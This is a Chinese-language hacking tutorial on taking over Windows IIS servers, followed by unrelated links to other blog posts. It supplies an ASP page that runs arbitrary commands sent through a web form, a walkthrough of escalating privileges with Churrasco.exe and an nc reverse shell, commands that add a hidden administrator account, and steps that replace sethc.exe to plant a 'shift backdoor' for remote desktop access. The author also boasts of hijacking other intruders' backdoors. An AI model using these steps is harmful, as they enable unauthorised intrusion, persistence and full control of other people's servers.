提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if %>

<form method="post">

<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>

<input type=text name="cmd" size=60><br>

<input type=submit value="net user"></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request("cmdx")="C:\RECYCLER\cmd.exe" then

response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall

end if

response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWORK SERVICE

/churrasco/-->Getting Rpcss PID ...

/churrasco/-->Found Rpcss PID: 696

/churrasco/-->Searching for Rpcss threads ...

/churrasco/-->Found Thread: 444

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 700

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 704

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 712

/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/-->Getting SYSTEM token from Rpcss Service...

/churrasco/-->Found szywjs Token

/churrasco/-->Found SYSTEM token 0xf1c

/churrasco/-->Running command with SYSTEM Token...

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe "net localgroup
administrators iisuser /add"
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe
c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\explorer.exe d:\windows\system32\sethc.exe"
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

SHIFT后门拿服务器之方法总结的更多相关文章

  1. linux下维护服务器之常用命令

    linux下维护服务器之常用命令! 第1套如下: 正则表达式: 1.如何不要文件中的空白行和注释语句: [root@localhost ~]# grep -v '^$' 文件名 |grep -v '^ ...

  2. backup服务器之rsync服务

    backup服务器之rsync服务   rsync是开源的.快速的.多功能的可实现全量及增量的本地或远程数据同步备份的优秀工具.它拥有scp.cp的全量复制功能,同时比scp.cp命令更优秀.更强大. ...

  3. 实现jquery.ajax及原生的XMLHttpRequest跨域调用WCF服务的方法

    关于ajax跨域调用WCF服务的方法很多,经过我反复的代码测试,认为如下方法是最为简便的,当然也不能说别人的方法是错误的,下面就来上代码,WCF服务定义还是延用上次的,如: namespace Wcf ...

  4. 实现jquery.ajax及原生的XMLHttpRequest调用WCF服务的方法

    废话不多说,直接讲解实现步骤 一.首先我们需定义支持WEB HTTP方法调用的WCF服务契约及实现服务契约类(重点关注各attribute),代码如下: //IAddService.cs namesp ...

  5. Web服务器之iis,apache,tomcat三者之间的比较

    IIS-Apache-Tomcat的区别 IIS与Tomcat的区别 IIS是微软公司的Web服务器.主要支持ASP语言环境. Tomcat是Java Servlet 2.2和JavaServer P ...

  6. WebService服务调用方法介绍

    1 背景概述 由于在项目中需要多次调用webservice服务,本文主要总结了一下java调用WebService常见的6种方式,即:四种框架的五种调用方法以及使用AEAI ESB进行调用的方法. 2 ...

  7. linux服务器之LVS、Nginx和HAProxy负载均衡器对比

    linux服务器之LVS.Nginx和HAProxy负载均衡器对比. LVS特点:  1.抗负载能力强,使用IP负载均衡技术,只做分发,所以LVS本身并没有多少流量产生:  2.稳定性.可靠性好,自身 ...

  8. Windows Server 2003开机自动启动MySQL服务设置方法

    Windows Server 2003开机自动启动MySQL服务设置方法 发布时间:2014-12-19 更新时间:2014-12-24 来源:网络 作者:eaglezhong 关键词: 2003 e ...

  9. 【转】Android 服务器之SFTP服务器上传下载功能

    原文网址:http://blog.csdn.net/tanghua0809/article/details/47056327 本文主要是讲解Android服务器之SFTP服务器的上传下载功能,也是对之 ...

随机推荐

  1. mysql列转行

    要得到 SELECT name, SUM(CASE course WHEN '语文' THEN score END ) AS '语文', SUM(CASE course WHEN '数学' THEN ...

  2. js 毫秒换算成秒

    $scope.formatSeconds = function (value) { var reg = /^(-|\+)?\d+$/; if (reg.test(value)) { var hour ...

  3. bzoj 1588 splay模板题

    用晚自习学了一下splay模板,没想象中那么难,主要是左旋和右旋可以简化到一个函数里边,减少代码长度... #include<iostream> #include<cstdio> ...

  4. 【GCJ2008E】日程表 最小割

    Google Code Jam 2008 E 日程表 [题目描述] 热情的选手Sphinny正在看新一年的日程表,并发现已经安排了很多编 程竞赛.她将这一年的每一天都用以下三种方式之一在日程表上打标记 ...

  5. 【BZOJ-1502】月下柠檬树 计算几何 + 自适应Simpson积分

    1502: [NOI2005]月下柠檬树 Time Limit: 5 Sec  Memory Limit: 64 MBSubmit: 1017  Solved: 562[Submit][Status] ...

  6. EF-CodeFirst 继承关系TPH、TPT、TPC

    继承关系 面向对象的三大特征之一:继承 ,在开发中起到了重要的作用.我们的实体本身也是类,继承自然是没有问题.下面开始分析 EF里的继承映射关系TPH.TPT.TPC 现在我们有这样一个需求,用户里要 ...

  7. linux下安装zookeeper(单机版)

    Zookeeper 分布式服务框架是用来解决分布式应用中经常遇到的一些数据管理问题,如:统一命名服务.状态同步服务.集群管理.分布式应用配置项的管理等.本文主要从使用者角度来介绍一下Zookeeper ...

  8. HTML5系列三(多媒体播放、本地存储、本地数据库、离线应用)

    各浏览器对编码格式的支持情况 audio和video元素的属性介绍 1.src:媒体数据的URL地址 <video src="pr6.mp4"></video&g ...

  9. BZOJ1804: [Ioi2007]Flood 洪水

    把点按坐标排序,每次找出最小的点,一定在最外层,再顺着把最外层的边删掉,经过了两次的边不会被冲毁. 其实不难写,但是写了很久. #include<bits/stdc++.h> #defin ...

  10. BZOJ2960: 跨平面

    从一条边出发遍历,每次找旋转角度最小的一条边作为下一条边,直到回到出发的边,就得到了一个区域.这样建出对偶图后跑不定根的最小树形图就行了. #include<bits/stdc++.h> ...